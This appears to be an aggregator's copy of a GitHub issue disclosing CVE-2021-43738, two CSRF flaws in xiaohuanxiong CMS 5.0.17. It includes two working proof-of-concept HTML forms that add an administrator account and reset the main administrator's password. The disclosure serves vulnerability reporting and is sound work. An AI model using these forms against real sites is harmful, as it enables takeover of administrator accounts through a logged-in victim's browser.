Headline

CVE-2021-43738: There is two CSRF vulnerability that can add the administrator account and modify administrator account's password · Issue #28 · hiliqi/xiaohuanxiong

An issue was discovered in xiaohuanxiong CMS 5.0.17 There is a CSRF vulnerability that can that can add the administrator account and modify administrator account’s password.

2 years ago

CVE

Open in Source

#csrf #vulnerability #java

After the administrator logged in, open the following two page and Click the button, you can use javascript to create a PoC that is triggered directly
poc:one—>add new administrator account

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://xiaohuangxiong.test/admin.php/Admins/create.html" method="POST">
      <input type="hidden" name="username" value="admin2" />
      <input type="hidden" name="password" value="123456" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://xiaohuangxiong.test/admin.php/Admins/edit.html" method="POST">
      <input type="hidden" name="id" value="1" />
      <input type="hidden" name="username" value="admin" />
      <input type="hidden" name="password" value="12345678" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda

11 months ago

11 months ago

11 months ago

11 months ago

11 months ago